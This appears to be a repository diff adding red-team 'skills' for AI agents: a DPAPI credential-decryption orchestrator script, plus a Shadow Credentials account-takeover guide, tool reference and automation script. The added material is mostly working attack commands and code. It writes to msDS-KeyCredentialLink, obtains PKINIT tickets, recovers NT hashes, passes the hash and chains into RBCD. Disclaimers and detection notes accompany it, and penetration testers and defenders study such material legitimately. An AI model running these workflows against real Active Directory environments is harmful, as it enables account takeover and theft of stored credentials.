skills/abusing-dpapi-for-credential-access/references/standards.md
+30
View File
@@ -0,0 +1,30 @@
# Standards and References — Abusing DPAPI for Credential Access
## NIST CSF 2.0
| ID | Name | Rationale |
|----|------|-----------|
| DE.CM-01 | Networks and network services are monitored to find potentially adverse events | DPAPI abuse generates detectable signals (MS-BKRP backup-key RPC to the DC, Protect/Credentials folder access, LSASS access) that monitoring must surface. |
## MITRE ATT&CK
| Technique ID | Name | Tactic | Rationale |
|--------------|------|--------|-----------|
| T1555.004 | Credentials from Password Stores: Windows Credential Manager | Credential Access | DPAPI protects Credential Manager/Vault entries; decrypting them recovers stored credentials. |
| T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Credential Access | SharpChrome decrypts DPAPI-protected browser logins/cookies. |
| T1003 | OS Credential Dumping | Credential Access | Extracting master keys and the domain backup key dumps credential material. |
## Supporting Frameworks and Standards
- **MS-BKRP** — BackupKey Remote Protocol; the RPC interface used to retrieve the domain DPAPI backup key.
- **MS-DPSP / DPAPI** — Microsoft's Data Protection API specification governing master keys and blob protection.
- **D3FEND** — Credential Eviction / Password Rotation as mitigations after DPAPI compromise.
## Official Resources
- SharpDPAPI / SharpChrome: https://github.com/GhostPack/SharpDPAPI
- Mimikatz: https://github.com/gentilkiwi/mimikatz
- Impacket: https://github.com/fortra/impacket
- DonPAPI: https://github.com/login-securite/DonPAPI
- HackTricks DPAPI: https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html
- SpecterOps "Operational Guidance for Offensive User DPAPI Abuse": https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
skills/abusing-dpapi-for-credential-access/scripts/agent.py
+154
View File
@@ -0,0 +1,154 @@
#!/usr/bin/env python3
# For authorized penetration testing and educational environments only.
# Usage against targets without prior mutual written consent is illegal.
# It is the end user's responsibility to obey all applicable laws.
"""DPAPI triage orchestrator.
Locates DPAPI artifacts (master keys, Credential Manager blobs, Vault entries)
on a mounted/exfiltrated user profile and drives SharpDPAPI (on Windows) or
Impacket's dpapi.py (cross-platform) to decrypt them with a supplied password,
NTLM hash, or domain backup key (.pvk).
This is an operator helper: it builds and runs the real tool commands and
parses their output; it does not reimplement DPAPI cryptography.
"""
import argparse
import os
import shutil
import subprocess
import sys
from datetime import datetime, timezone
# Standard relative locations inside a Windows user profile.
PROTECT_REL = os.path.join("AppData", "Roaming", "Microsoft", "Protect")
CRED_REL = os.path.join("AppData", "Local", "Microsoft", "Credentials")
VAULT_LOCAL_REL = os.path.join("AppData", "Local", "Microsoft", "Vault")
VAULT_ROAM_REL = os.path.join("AppData", "Roaming", "Microsoft", "Vault")
def find_tool(candidates):
"""Return the first available tool path from candidates, else None."""
for name in candidates:
path = shutil.which(name)
if path:
return path
return None
def enumerate_artifacts(profile):
"""Walk a user profile and collect DPAPI artifact file paths."""
found = {"masterkeys": [], "credentials": [], "vaults": []}
mapping = {
"masterkeys": os.path.join(profile, PROTECT_REL),
"credentials": os.path.join(profile, CRED_REL),
"vaults": os.path.join(profile, VAULT_LOCAL_REL),
}
for key, base in mapping.items():
if not os.path.isdir(base):
continue
for root, _dirs, files in os.walk(base):
for fname in files:
# Master keys are GUID-named; skip preferred/BK marker files noise.
found[key].append(os.path.join(root, fname))
# Also include roaming vault if present.
vroam = os.path.join(profile, VAULT_ROAM_REL)
if os.path.isdir(vroam):
for root, _dirs, files in os.walk(vroam):
for fname in files:
found["vaults"].append(os.path.join(root, fname))
return found
def run_cmd(cmd, timeout):
"""Run an external command and return (rc, stdout, stderr)."""
try:
proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
return proc.returncode, proc.stdout, proc.stderr
except FileNotFoundError:
return 127, "", f"tool not found: {cmd[0]}"
except subprocess.TimeoutExpired:
return 124, "", f"timeout after {timeout}s"
def decrypt_masterkey_impacket(tool, mk_file, pvk, timeout):
"""Decrypt one master key file via impacket-dpapi using a backup .pvk."""
cmd = [tool, "masterkey", "-file", mk_file, "-pvk", pvk]
rc, out, err = run_cmd(cmd, timeout)
return {"file": mk_file, "rc": rc, "output": (out or err).strip()[:2000]}
def sharpdpapi_triage(tool, profile, pvk, password, ntlm, timeout):
"""Build and run a SharpDPAPI triage command appropriate to the inputs."""
cmd = [tool, "triage"]
if pvk:
cmd += [f"/pvk:{pvk}"]
elif password:
cmd += [f"/password:{password}"]
elif ntlm:
cmd += [f"/ntlm:{ntlm}"]
else:
cmd += ["/unprotect"]
rc, out, err = run_cmd(cmd, timeout)
return {"rc": rc, "output": (out or err).strip()}
def main():
parser = argparse.ArgumentParser(description="Authorized DPAPI triage helper")
parser.add_argument("--profile", help="Path to a (mounted) Windows user profile")
parser.add_argument("--pvk", help="Domain DPAPI backup key (.pvk)")
parser.add_argument("--password", help="User plaintext password")
parser.add_argument("--ntlm", help="User NTLM hash")
parser.add_argument("--mode", choices=["enumerate", "impacket", "sharpdpapi"],
default="enumerate",
help="enumerate artifacts, or drive a decryption tool")
parser.add_argument("--timeout", type=int, default=120, help="Per-command timeout")
args = parser.parse_args()
ts = datetime.now(timezone.utc).isoformat()
print(f"[*] DPAPI triage helper — {ts}")
print("[!] Authorized use only. Confirm rules-of-engagement before proceeding.\n")
if args.mode in ("enumerate", "impacket"):
if not args.profile or not os.path.isdir(args.profile):
print("[!] --profile must point to an existing user profile directory",
file=sys.stderr)
sys.exit(2)
artifacts = enumerate_artifacts(args.profile)
for kind, items in artifacts.items():
print(f"--- {kind.upper()} ({len(items)}) ---")
for p in items:
print(f" {p}")
if args.mode == "impacket":
if not args.pvk:
print("\n[!] --pvk required for impacket master key decryption",
file=sys.stderr)
sys.exit(2)
tool = find_tool(["impacket-dpapi", "dpapi.py"])
if not tool:
print("[!] impacket-dpapi not found. Install: pipx install impacket",
file=sys.stderr)
sys.exit(2)
print("\n=== Decrypting master keys with backup key ===")
for mk in artifacts["masterkeys"]:
res = decrypt_masterkey_impacket(tool, mk, args.pvk, args.timeout)
print(f" [{res['rc']}] {res['file']}")
if res["output"]:
print(f" {res['output'][:300]}")
return
# sharpdpapi mode (Windows operator host)
tool = find_tool(["SharpDPAPI.exe", "SharpDPAPI"])
if not tool:
print("[!] SharpDPAPI not found on PATH. Build from "
"https://github.com/GhostPack/SharpDPAPI", file=sys.stderr)
sys.exit(2)
result = sharpdpapi_triage(tool, args.profile, args.pvk, args.password,
args.ntlm, args.timeout)
print("=== SharpDPAPI triage ===")
print(result["output"])
sys.exit(0 if result["rc"] == 0 else 1)
if __name__ == "__main__":
main()
skills/abusing-shadow-credentials-for-privesc/LICENSE
+201
View File
@@ -0,0 +1,201 @@
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to the Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by the Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding any notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. Please do not remove or change
the license header comment from a contributed file except when
necessary.
Copyright 2026 mukul975
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
skills/abusing-shadow-credentials-for-privesc/SKILL.md
+185
View File
@@ -0,0 +1,185 @@
---
name: abusing-shadow-credentials-for-privesc
description: Take over Active Directory user and computer accounts by writing alternate certificate keys to msDS-KeyCredentialLink (Shadow Credentials) with pyWhisker, Whisker, and Certipy, then authenticate via PKINIT.
domain: cybersecurity
subdomain: red-teaming
tags:
- red-team
- active-directory
- shadow-credentials
- pywhisker
- certipy
- pkinit
- key-credential-link
- privilege-escalation
version: '1.0'
author: mahipal
license: Apache-2.0
nist_csf:
- PR.AA-05
mitre_attack:
- T1098.005
---
# Abusing Shadow Credentials for Privilege Escalation
> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Shadow Credentials grant full takeover of the targeted account. Use only against systems you own or are explicitly authorized in writing to test. Unauthorized access is a crime.
## Overview
The **Shadow Credentials** technique abuses the `msDS-KeyCredentialLink` attribute of Active Directory user and computer objects. This attribute stores raw public keys ("Key Credentials") used by Windows Hello for Business and Azure AD device registration for passwordless certificate-based logon via PKINIT (Public Key Cryptography for Initial Authentication in Kerberos). If an attacker has write permission over a target object's `msDS-KeyCredentialLink` — typically granted by `GenericWrite`, `GenericAll`, `WriteProperty`, or `AddKeyCredentialLink` ACEs surfaced in BloodHound — they can append their own attacker-generated public key. They then request a TGT for the target via PKINIT using the matching private key and recover the target's NT hash, achieving complete account takeover **without resetting the password**, which is far stealthier than a forced password reset.
The technique was published by Elad Shamir (*"Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover"*) and implemented in the C# tool **Whisker**. The Python equivalent **pyWhisker** (ShutdownRepo) manipulates the attribute over LDAP, and **Certipy** integrates the entire chain via `certipy shadow auto`. The target environment must support PKINIT and have at least one Domain Controller running Windows Server 2016 or later. Sources: [pyWhisker](https://github.com/ShutdownRepo/pywhisker), [Whisker](https://github.com/eladshamir/Whisker), [The Hacker Recipes — Shadow Credentials](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials).
## When to Use
- When BloodHound reveals `GenericWrite`/`GenericAll`/`AddKeyCredentialLink` over a higher-value user or computer
- As a stealthier alternative to `ForceChangePassword` (no password reset = less disruption/alerting)
- To take over a computer account to chain into Resource-Based Constrained Delegation (RBCD)
- During red-team operations needing account takeover without locking out the legitimate user
- For purple-team exercises generating `msDS-KeyCredentialLink` modification telemetry
## Prerequisites
- Authorized engagement scope including AD credential-access techniques
- Control of a principal with write access to the target's `msDS-KeyCredentialLink`
- A DC running Windows Server 2016+ with PKINIT enabled (domain functional level supporting Key Trust)
- Network reachability to LDAP (389/636) and Kerberos (88) on a DC
- Linux attack host with Python 3.8+; install the tooling:
```bash
# pyWhisker (from source)
git clone https://github.com/ShutdownRepo/pywhisker
cd pywhisker && pip install .
# Certipy (integrated shadow attack)
pipx install certipy-ad
# PKINITtools for manual TGT/NT-hash extraction
git clone https://github.com/dirkjanm/PKINITtools
```
## Objectives
- Confirm write access over a target's `msDS-KeyCredentialLink`
- Generate a key pair and append a Key Credential to the target object
- Request a TGT for the target via PKINIT using the new key
- Recover the target's NT hash for pass-the-hash / further movement
- Clean up the injected Key Credential to restore the object's state
- Document the ACL path that enabled the attack for remediation
## MITRE ATT&CK Mapping
| ID | Technique | Application in this skill |
|----|-----------|---------------------------|
| T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential (device key) to `msDS-KeyCredentialLink` to register an alternate authentication credential for the target account |
## Workflow
### Step 1: Confirm the write primitive
List existing Key Credentials on the target to verify you have the required access. An empty or readable result confirms write access for the `add` step.
```bash
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "list"
```
### Step 2: Add a Shadow Credential with pyWhisker
Generate a certificate/key pair and write it into the target's `msDS-KeyCredentialLink`. pyWhisker outputs a PFX you control.
```bash
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "add" --filename victim_shadow
# Produces victim_shadow.pfx and prints the PFX password
```
Use Kerberos auth instead of a password if you only hold a ticket:
```bash
python3 pywhisker.py -d "corp.local" -u "attacker" -k --no-pass \
--target "victim" --action "add" --filename victim_shadow --use-ldaps
```
### Step 3: Request a TGT via PKINIT
Use the generated PFX with PKINITtools to obtain a Kerberos TGT for the target.
```bash
python3 PKINITtools/gettgtpkinit.py \
-cert-pfx victim_shadow.pfx -pfx-pass <PFX_PASSWORD> \
corp.local/victim victim.ccache
```
### Step 4: Recover the NT hash
Extract the target's NT hash from the AS-REP using the session key from Step 3 (`getnthash.py` reads the AS-REP encryption key, displayed by `gettgtpkinit.py`).
```bash
export KRB5CCNAME=victim.ccache
python3 PKINITtools/getnthash.py -key <AS-REP-KEY-FROM-STEP-3> corp.local/victim
# Prints the NT hash for 'victim'
```
### Step 5: One-shot alternative with Certipy
Certipy's `shadow auto` performs add → PKINIT → dump hash → cleanup automatically, which is ideal for computer-account takeover.
```bash
certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'victim'
# For a computer account, use the sAMAccountName with trailing $
certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'WS01$'
```
### Step 6: Use the recovered credential
Authenticate with the NT hash (or the TGT) to continue the engagement.
```bash
# Pass-the-hash with NetExec
nxc smb 10.0.0.10 -u victim -H <RECOVERED-NT-HASH>
# Or use the TGT directly
export KRB5CCNAME=victim.ccache
nxc smb dc.corp.local -u victim --use-kcache
```
### Step 7: Chain computer takeover into RBCD (optional)
When the target is a computer, the recovered key/hash lets you configure Resource-Based Constrained Delegation to impersonate any user to that host.
```bash
# Set RBCD so attacker-controlled SPN can impersonate to WS01$
impacket-rbcd -delegate-from 'attacker$' -delegate-to 'WS01$' \
-action write 'corp.local/attacker:Passw0rd!'
```
### Step 8: Clean up
Remove the injected Key Credential to restore the object and reduce detection footprint.
```bash
# pyWhisker: remove by device-id (printed during add) or clear all you added
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "remove" --device-id <DEVICE-ID>
# Certipy shadow auto cleans up automatically; otherwise:
certipy shadow clear -u 'attacker@corp.local' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'victim'
```
## Tools and Resources
| Resource | Purpose | Link |
|----------|---------|------|
| pyWhisker | Python LDAP manipulation of msDS-KeyCredentialLink | https://github.com/ShutdownRepo/pywhisker |
| Whisker | Original C# implementation | https://github.com/eladshamir/Whisker |
| Certipy | `shadow auto` end-to-end takeover | https://github.com/ly4k/Certipy |
| PKINITtools | gettgtpkinit / getnthash | https://github.com/dirkjanm/PKINITtools |
| The Hacker Recipes | Technique walkthrough & defenses | https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials |
## Detection and Remediation Notes
| Area | Guidance |
|------|----------|
| Detection | Monitor Windows Security Event ID 5136 (directory object modified) for changes to `msDS-KeyCredentialLink`; alert when a non-AD-Connect/non-Intune principal writes the attribute. |
| Auditing | Enable directory service object change auditing on user/computer OUs. |
| Least privilege | Remove unnecessary `GenericWrite`/`GenericAll`/`AddKeyCredentialLink` ACEs (BloodHound `AddKeyCredentialLink` edge). |
| Mitigation | Where Windows Hello/device registration is unused, restrict who can write Key Credentials and consider tier-0 protected accounts. |
## Validation Criteria
- [ ] Write access over the target's `msDS-KeyCredentialLink` confirmed (`list` succeeded)
- [ ] Key Credential successfully added (PFX generated)
- [ ] PKINIT TGT obtained for the target account
- [ ] Target NT hash recovered and validated against a service
- [ ] (If computer) RBCD chain or onward movement demonstrated
- [ ] Injected Key Credential removed / object restored
- [ ] Enabling ACL path documented with remediation recommendation
skills/abusing-shadow-credentials-for-privesc/references/api-reference.md
+68
View File
@@ -0,0 +1,68 @@
# Shadow Credentials Tooling Reference
## pyWhisker (https://github.com/ShutdownRepo/pywhisker)
Invocation: `python3 pywhisker.py [auth] --target <obj> --action <action> [opts]`
| Flag | Meaning |
|------|---------|
| `-d DOMAIN` | Target domain (FQDN) |
| `-u USER` | Controlled username |
| `-p PASSWORD` | Password |
| `-k` / `--no-pass` | Kerberos auth (uses KRB5CCNAME) |
| `-H LM:NT` | Pass-the-hash |
| `--target NAME` | Target user/computer whose attribute is modified |
| `--action list` | Enumerate existing Key Credentials |
| `--action add` | Generate key pair, write Key Credential |
| `--action remove` | Remove one Key Credential by `--device-id` |
| `--action clear` | Remove all Key Credentials |
| `--action info` | Show details of a Key Credential |
| `--filename NAME` | Output PFX/PEM base name |
| `--export PEM|PFX` | Output format (default PFX) |
| `--device-id GUID` | Target device for remove/info |
| `--dc-ip IP` | Domain Controller IP |
| `--use-ldaps` | Use LDAPS (636) |
### Example
```bash
python3 pywhisker.py -d corp.local -u attacker -p 'Passw0rd!' \
--target victim --action add --filename victim_shadow
```
## Certipy `shadow` (https://github.com/ly4k/Certipy)
| Command | Meaning |
|---------|---------|
| `certipy shadow auto` | Add → PKINIT → dump NT hash → cleanup (end to end) |
| `certipy shadow add` | Add Key Credential only |
| `certipy shadow list` | List Key Credentials |
| `certipy shadow clear` | Clear Key Credentials |
| `certipy shadow info` | Show Key Credential info |
Key flags: `-u USER@DOMAIN`, `-p PW` / `-hashes :NT` / `-k -no-pass`,
`-dc-ip IP`, `-account TARGET` (use trailing `$` for computers), `-ns IP`, `-dns-tcp`.
### Example
```bash
certipy shadow auto -u attacker@corp.local -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'WS01$'
```
## PKINITtools (https://github.com/dirkjanm/PKINITtools)
| Script | Purpose |
|--------|---------|
| `gettgtpkinit.py -cert-pfx FILE -pfx-pass PW DOMAIN/USER out.ccache` | Request TGT via PKINIT; prints AS-REP key |
| `getnthash.py -key <AS-REP-KEY> DOMAIN/USER` | Recover NT hash (KRB5CCNAME set) |
### Example
```bash
python3 gettgtpkinit.py -cert-pfx victim_shadow.pfx -pfx-pass abc123 \
corp.local/victim victim.ccache
export KRB5CCNAME=victim.ccache
python3 getnthash.py -key <AS-REP-KEY> corp.local/victim
```
## Detection signal
- Event ID 5136 — modification of `msDS-KeyCredentialLink` (Directory Service Changes auditing).
- BloodHound edge: `AddKeyCredentialLink`.
skills/abusing-shadow-credentials-for-privesc/references/standards.md
+21
View File
@@ -0,0 +1,21 @@
# Standards Mapping — Abusing Shadow Credentials for Privilege Escalation
## MITRE ATT&CK (Enterprise)
| ID | Name | Rationale |
|----|------|-----------|
| T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential to `msDS-KeyCredentialLink` registers an alternate device/certificate credential for the target, which is exactly the device-registration manipulation this sub-technique describes. |
Reference: https://attack.mitre.org/techniques/T1098/005/
Related techniques exercised in the chain:
- T1649 (Steal or Forge Authentication Certificates) — the PKINIT certificate used to authenticate.
- T1550.003 / T1558 — using the recovered TGT/hash for movement.
## NIST Cybersecurity Framework 2.0
| ID | Name | Rationale |
|----|------|-----------|
| PR.AA-05 | Access permissions, entitlements, and authorizations are defined, managed, and enforced incorporating least privilege and separation of duties | The attack is only possible because of over-permissive ACEs (`GenericWrite`/`GenericAll`/`AddKeyCredentialLink`) on AD objects; remediation is least-privilege enforcement of who may write Key Credentials. |
Reference: https://csrc.nist.gov/projects/cybersecurity-framework
skills/abusing-shadow-credentials-for-privesc/scripts/agent.py
+145
View File
@@ -0,0 +1,145 @@
#!/usr/bin/env python3
"""
shadowcred_takeover.py — Orchestrate a Shadow Credentials account takeover.
Wraps the real `certipy shadow auto` workflow (and optionally pyWhisker +
PKINITtools) to add a Key Credential to a target's msDS-KeyCredentialLink,
recover the NT hash via PKINIT, and clean up. Parses the tool output to surface
the recovered NT hash and TGT path.
Authorized use only. Requires write access over the target's
msDS-KeyCredentialLink and a DC running Windows Server 2016+ with PKINIT.
Install:
pipx install certipy-ad
git clone https://github.com/ShutdownRepo/pywhisker
git clone https://github.com/dirkjanm/PKINITtools
Examples:
python shadowcred_takeover.py certipy -u attacker@corp.local -p 'Passw0rd!' \
--dc-ip 10.0.0.100 --target 'WS01$'
python shadowcred_takeover.py pywhisker -d corp.local -u attacker \
-p 'Passw0rd!' --dc-ip 10.0.0.100 --target victim \
--pywhisker ./pywhisker/pywhisker.py
"""
import argparse
import os
import re
import shutil
import subprocess
import sys
def _which_or_die(binary, hint):
if shutil.which(binary) is None and not os.path.exists(binary):
sys.exit(f"[!] '{binary}' not found. {hint}")
def run(cmd, timeout=600):
print("[*] Running:", " ".join(cmd))
try:
proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
sys.exit(f"[!] Command timed out after {timeout}s.")
out = proc.stdout + proc.stderr
print(out)
return proc.returncode, out
def parse_nthash(text):
"""Certipy prints 'Got hash for ...: aad3b...:<NT>'. Extract the NT half."""
m = re.search(r"[Gg]ot hash for .*?:\s*([0-9a-fA-F]{32}):([0-9a-fA-F]{32})", text)
if m:
return m.group(2)
m = re.search(r"\b[0-9a-fA-F]{32}:([0-9a-fA-F]{32})\b", text)
return m.group(1) if m else None
def certipy_flow(args):
_which_or_die("certipy", "Install with: pipx install certipy-ad")
cmd = ["certipy", "shadow", "auto",
"-u", args.user, "-dc-ip", args.dc_ip, "-account", args.target]
if args.password:
cmd += ["-p", args.password]
elif args.hashes:
cmd += ["-hashes", args.hashes]
elif args.kerberos:
cmd += ["-k", "-no-pass"]
else:
sys.exit("[!] Provide -p, --hashes, or -k.")
if args.ns:
cmd += ["-ns", args.ns, "-dns-tcp"]
rc, out = run(cmd)
if rc != 0:
sys.exit("[!] certipy shadow auto failed.")
nt = parse_nthash(out)
if nt:
print(f"\n[+] Recovered NT hash for {args.target}: {nt}")
print(f"[+] Reuse it: nxc smb {args.dc_ip} -u {args.target.rstrip('$')} -H {nt}")
else:
print("[!] Could not auto-extract NT hash; review output above.")
def pywhisker_flow(args):
if not args.pywhisker or not os.path.exists(args.pywhisker):
sys.exit("[!] --pywhisker must point to pywhisker.py")
base = "shadow_" + args.target.rstrip("$")
cmd = ["python3", args.pywhisker, "-d", args.domain, "-u", args.user,
"--target", args.target, "--action", "add", "--filename", base]
if args.password:
cmd += ["-p", args.password]
elif args.kerberos:
cmd += ["-k", "--no-pass"]
else:
sys.exit("[!] Provide -p or -k.")
if args.dc_ip:
cmd += ["--dc-ip", args.dc_ip]
rc, out = run(cmd)
if rc != 0:
sys.exit("[!] pyWhisker add failed.")
pfx_pass = None
m = re.search(r"[Pp]assword(?: for the PFX)?:\s*(\S+)", out)
if m:
pfx_pass = m.group(1)
print(f"\n[+] Key Credential added. PFX: {base}.pfx PFX-pass: {pfx_pass}")
print("[+] Next, request a TGT with PKINITtools:")
print(f" python3 gettgtpkinit.py -cert-pfx {base}.pfx -pfx-pass {pfx_pass} "
f"{args.domain}/{args.target.rstrip('$')} {base}.ccache")
print(" export KRB5CCNAME=%s.ccache" % base)
print(f" python3 getnthash.py -key <AS-REP-KEY> {args.domain}/{args.target.rstrip('$')}")
print("[!] Remember to clean up the injected Key Credential when done:")
print(f" python3 {args.pywhisker} -d {args.domain} -u {args.user} "
f"--target {args.target} --action clear")
def main():
ap = argparse.ArgumentParser(description="Shadow Credentials takeover orchestrator.")
sub = ap.add_subparsers(dest="mode", required=True)
c = sub.add_parser("certipy", help="Use certipy shadow auto (end to end)")
c.add_argument("-u", "--user", required=True, help="attacker@domain")
c.add_argument("-p", "--password")
c.add_argument("--hashes")
c.add_argument("-k", "--kerberos", action="store_true")
c.add_argument("--dc-ip", required=True, dest="dc_ip")
c.add_argument("--target", required=True, help="victim or WS01$")
c.add_argument("--ns")
w = sub.add_parser("pywhisker", help="Use pyWhisker add (manual PKINIT after)")
w.add_argument("-d", "--domain", required=True)
w.add_argument("-u", "--user", required=True)
w.add_argument("-p", "--password")
w.add_argument("-k", "--kerberos", action="store_true")
w.add_argument("--dc-ip", dest="dc_ip")
w.add_argument("--target", required=True)
w.add_argument("--pywhisker", required=True, help="Path to pywhisker.py")
args = ap.parse_args()
if args.mode == "certipy":
certipy_flow(args)
else:
pywhisker_flow(args)
if __name__ == "__main__":
main()
skills/achieving-cmmc-level-2-compliance/LICENSE
+201
View File
@@ -0,0 +1,201 @@
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
